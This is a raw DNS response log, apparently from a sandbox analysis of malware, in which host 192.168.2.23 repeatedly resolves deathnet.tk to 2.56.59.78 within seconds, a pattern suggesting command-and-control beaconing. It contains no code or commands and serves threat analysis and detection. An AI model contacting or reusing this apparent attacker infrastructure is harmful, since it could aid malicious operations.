              Mar 21, 2022 20:08:13.173840046 CET8.8.8.8192.168.2.230xdbd4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.218328953 CET8.8.8.8192.168.2.230x8630No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.267450094 CET8.8.8.8192.168.2.230xf61bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.311712980 CET8.8.8.8192.168.2.230xa563No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.355422020 CET8.8.8.8192.168.2.230xb285No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.400062084 CET8.8.8.8192.168.2.230x88c8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.442795992 CET8.8.8.8192.168.2.230xb696No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.486028910 CET8.8.8.8192.168.2.230xb71bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.530863047 CET8.8.8.8192.168.2.230x4d5bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.575200081 CET8.8.8.8192.168.2.230xbddbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.617901087 CET8.8.8.8192.168.2.230xeabbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.663722992 CET8.8.8.8192.168.2.230xa257No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.709136009 CET8.8.8.8192.168.2.230xdc9dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.753798962 CET8.8.8.8192.168.2.230xac03No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.798713923 CET8.8.8.8192.168.2.230xb39aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.841412067 CET8.8.8.8192.168.2.230x42fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.884865046 CET8.8.8.8192.168.2.230x6bf1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.930295944 CET8.8.8.8192.168.2.230xc71No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.974993944 CET8.8.8.8192.168.2.230x3be4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.019870043 CET8.8.8.8192.168.2.230x976fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.065156937 CET8.8.8.8192.168.2.230xd270No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.110038996 CET8.8.8.8192.168.2.230x9044No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.155736923 CET8.8.8.8192.168.2.230xfd4bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.200467110 CET8.8.8.8192.168.2.230xb184No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.243483067 CET8.8.8.8192.168.2.230x1d0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.288311958 CET8.8.8.8192.168.2.230x54cbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.334438086 CET8.8.8.8192.168.2.230x3d03No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.379638910 CET8.8.8.8192.168.2.230x2fe1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.424972057 CET8.8.8.8192.168.2.230xd435No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.467376947 CET8.8.8.8192.168.2.230xe8f5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.511744022 CET8.8.8.8192.168.2.230x3a7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.558846951 CET8.8.8.8192.168.2.230x11f7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.601537943 CET8.8.8.8192.168.2.230xe84fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.644612074 CET8.8.8.8192.168.2.230xa88dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.689873934 CET8.8.8.8192.168.2.230x11adNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.734695911 CET8.8.8.8192.168.2.230x8aecNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.778347015 CET8.8.8.8192.168.2.230x48d6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.824126959 CET8.8.8.8192.168.2.230xadffNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.868448019 CET8.8.8.8192.168.2.230x3f0bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.918636084 CET8.8.8.8192.168.2.230x66ebNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.962245941 CET8.8.8.8192.168.2.230xb141No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:15.006261110 CET8.8.8.8192.168.2.230x3ca3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:15.051569939 CET8.8.8.8192.168.2.230xe3e7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:15.098429918 CET8.8.8.8192.168.2.230x2b25No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:15.143428087 CET8.8.8.8192.168.2.230x380dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:15.186342001 CET8.8.8.8192.168.2.230xddd1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:15.232198000 CET8.8.8.8192.168.2.230x4b7eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:15.276871920 CET8.8.8.8192.168.2.230xbc1cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:15.320337057 CET8.8.8.8192.168.2.230xab4eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.366180897 CET8.8.8.8192.168.2.230xa3fcNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.411272049 CET8.8.8.8192.168.2.230xf05cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.456610918 CET8.8.8.8192.168.2.230xd4ceNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.502450943 CET8.8.8.8192.168.2.230x1515No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.548930883 CET8.8.8.8192.168.2.230x3000No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.593925953 CET8.8.8.8192.168.2.230xb8dfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.638927937 CET8.8.8.8192.168.2.230x724fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.686394930 CET8.8.8.8192.168.2.230x707dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.733263969 CET8.8.8.8192.168.2.230x75ddNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.778698921 CET8.8.8.8192.168.2.230xcad8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.825521946 CET8.8.8.8192.168.2.230x1b44No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.869929075 CET8.8.8.8192.168.2.230x50d0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.916287899 CET8.8.8.8192.168.2.230x314aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.962399006 CET8.8.8.8192.168.2.230xb908No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.010634899 CET8.8.8.8192.168.2.230xb6dcNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.053913116 CET8.8.8.8192.168.2.230xccc2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.097055912 CET8.8.8.8192.168.2.230xaedfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.141989946 CET8.8.8.8192.168.2.230x1263No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.187541962 CET8.8.8.8192.168.2.230xac9aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.230289936 CET8.8.8.8192.168.2.230x3034No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.277137041 CET8.8.8.8192.168.2.230x6d6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.325814962 CET8.8.8.8192.168.2.230x1bb8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.372078896 CET8.8.8.8192.168.2.230x7818No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.414634943 CET8.8.8.8192.168.2.230xcb86No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.458543062 CET8.8.8.8192.168.2.230x7b16No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.506483078 CET8.8.8.8192.168.2.230x2900No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.549058914 CET8.8.8.8192.168.2.230xef00No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.593269110 CET8.8.8.8192.168.2.230xb348No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.640182018 CET8.8.8.8192.168.2.230x36d5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.688740969 CET8.8.8.8192.168.2.230xd23fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.735774040 CET8.8.8.8192.168.2.230x7985No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.782134056 CET8.8.8.8192.168.2.230x5962No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.827972889 CET8.8.8.8192.168.2.230x26e5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.872045040 CET8.8.8.8192.168.2.230x79d2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.918246031 CET8.8.8.8192.168.2.230x61efNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.963958025 CET8.8.8.8192.168.2.230x6281No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.013571978 CET8.8.8.8192.168.2.230x427No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.059533119 CET8.8.8.8192.168.2.230x666eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.107975960 CET8.8.8.8192.168.2.230xcdfbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.155576944 CET8.8.8.8192.168.2.230x1f6aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.201100111 CET8.8.8.8192.168.2.230xfc47No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.246423960 CET8.8.8.8192.168.2.230x12fbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.293057919 CET8.8.8.8192.168.2.230xeb96No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.338294983 CET8.8.8.8192.168.2.230x7a01No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.384705067 CET8.8.8.8192.168.2.230x8b19No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.432667971 CET8.8.8.8192.168.2.230xe986No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.483802080 CET8.8.8.8192.168.2.230x8c94No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.529233932 CET8.8.8.8192.168.2.230x98edNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.580668926 CET8.8.8.8192.168.2.230x727dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.626961946 CET8.8.8.8192.168.2.230xa200No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.675534010 CET8.8.8.8192.168.2.230x5696No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.724805117 CET8.8.8.8192.168.2.230xfd81No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.776387930 CET8.8.8.8192.168.2.230x6cabNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.822783947 CET8.8.8.8192.168.2.230xcb28No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.871918917 CET8.8.8.8192.168.2.230x96c8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.923352957 CET8.8.8.8192.168.2.230x654bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.972780943 CET8.8.8.8192.168.2.230x50ebNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.024781942 CET8.8.8.8192.168.2.230x1c2dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.075818062 CET8.8.8.8192.168.2.230xd630No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.124790907 CET8.8.8.8192.168.2.230xac98No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.180541992 CET8.8.8.8192.168.2.230x6b81No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.230931997 CET8.8.8.8192.168.2.230x929aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.282466888 CET8.8.8.8192.168.2.230xb542No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.334299088 CET8.8.8.8192.168.2.230xa5a5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.379749060 CET8.8.8.8192.168.2.230x4e90No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.424343109 CET8.8.8.8192.168.2.230x6806No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.470837116 CET8.8.8.8192.168.2.230xb376No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.514158010 CET8.8.8.8192.168.2.230xe93aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.559676886 CET8.8.8.8192.168.2.230x505No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.607633114 CET8.8.8.8192.168.2.230xb460No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.656774044 CET8.8.8.8192.168.2.230x8087No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.704013109 CET8.8.8.8192.168.2.230x18a4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.756902933 CET8.8.8.8192.168.2.230x511eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.801350117 CET8.8.8.8192.168.2.230x4ce2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.846582890 CET8.8.8.8192.168.2.230xd34bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.892559052 CET8.8.8.8192.168.2.230xdf01No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.937148094 CET8.8.8.8192.168.2.230xe7a8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.982305050 CET8.8.8.8192.168.2.230x529cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.026555061 CET8.8.8.8192.168.2.230xf529No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.080624104 CET8.8.8.8192.168.2.230xda9eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.130270958 CET8.8.8.8192.168.2.230x65c7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.174686909 CET8.8.8.8192.168.2.230xe0f6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.217673063 CET8.8.8.8192.168.2.230xc591No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.262252092 CET8.8.8.8192.168.2.230x70b2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.308438063 CET8.8.8.8192.168.2.230x5a44No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.351938009 CET8.8.8.8192.168.2.230xc265No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.398328066 CET8.8.8.8192.168.2.230xac5eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.443236113 CET8.8.8.8192.168.2.230x227bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.490577936 CET8.8.8.8192.168.2.230x9069No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.543838024 CET8.8.8.8192.168.2.230xc94aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.612072945 CET8.8.8.8192.168.2.230xeac3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.657349110 CET8.8.8.8192.168.2.230xcfeeNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.703146935 CET8.8.8.8192.168.2.230x308aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.746833086 CET8.8.8.8192.168.2.230x7171No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.793375969 CET8.8.8.8192.168.2.230xce50No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.838099003 CET8.8.8.8192.168.2.230x5f1dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.882524014 CET8.8.8.8192.168.2.230x8445No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.925677061 CET8.8.8.8192.168.2.230x130bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.974312067 CET8.8.8.8192.168.2.230x3c24No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.021460056 CET8.8.8.8192.168.2.230x84b6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.066576004 CET8.8.8.8192.168.2.230xad26No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.116750002 CET8.8.8.8192.168.2.230xc073No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.159622908 CET8.8.8.8192.168.2.230x9e66No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.208955050 CET8.8.8.8192.168.2.230x8961No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.253890038 CET8.8.8.8192.168.2.230x434No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.302325964 CET8.8.8.8192.168.2.230xc872No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.346873999 CET8.8.8.8192.168.2.230xe8a2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.395386934 CET8.8.8.8192.168.2.230x666bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.441418886 CET8.8.8.8192.168.2.230xadd2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.485940933 CET8.8.8.8192.168.2.230x975bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.529459953 CET8.8.8.8192.168.2.230x7512No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.573009968 CET8.8.8.8192.168.2.230x9b4fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.615838051 CET8.8.8.8192.168.2.230xa254No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.663944006 CET8.8.8.8192.168.2.230x6b10No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.710325956 CET8.8.8.8192.168.2.230x9357No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.758145094 CET8.8.8.8192.168.2.230x6989No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.802308083 CET8.8.8.8192.168.2.230x515bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.847448111 CET8.8.8.8192.168.2.230x407fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.892581940 CET8.8.8.8192.168.2.230xa201No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.942461967 CET8.8.8.8192.168.2.230x3b7fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.987341881 CET8.8.8.8192.168.2.230x90d0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.034274101 CET8.8.8.8192.168.2.230x85No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.079091072 CET8.8.8.8192.168.2.230xa18dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.124666929 CET8.8.8.8192.168.2.230x1540No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.169091940 CET8.8.8.8192.168.2.230x83a4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.212483883 CET8.8.8.8192.168.2.230x4057No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.256200075 CET8.8.8.8192.168.2.230x89feNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.299889088 CET8.8.8.8192.168.2.230xba4bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.349922895 CET8.8.8.8192.168.2.230x35a9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.398824930 CET8.8.8.8192.168.2.230xb351No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.445451021 CET8.8.8.8192.168.2.230xdb02No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.492834091 CET8.8.8.8192.168.2.230xa382No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.537853956 CET8.8.8.8192.168.2.230xf8aaNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.587291002 CET8.8.8.8192.168.2.230x7b2dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.637082100 CET8.8.8.8192.168.2.230xca45No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.683902025 CET8.8.8.8192.168.2.230xa8adNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.729563951 CET8.8.8.8192.168.2.230x1813No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.780038118 CET8.8.8.8192.168.2.230x6c85No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.823185921 CET8.8.8.8192.168.2.230x946bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.876194954 CET8.8.8.8192.168.2.230xa4d3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.923433065 CET8.8.8.8192.168.2.230x1827No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.971339941 CET8.8.8.8192.168.2.230xe888No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.016197920 CET8.8.8.8192.168.2.230x683eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.061081886 CET8.8.8.8192.168.2.230x3429No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.107217073 CET8.8.8.8192.168.2.230x6b66No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.153141022 CET8.8.8.8192.168.2.230xbe2fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.200381041 CET8.8.8.8192.168.2.230xd09dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.244285107 CET8.8.8.8192.168.2.230x14bdNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.288181067 CET8.8.8.8192.168.2.230x6edeNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.338006020 CET8.8.8.8192.168.2.230x7040No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
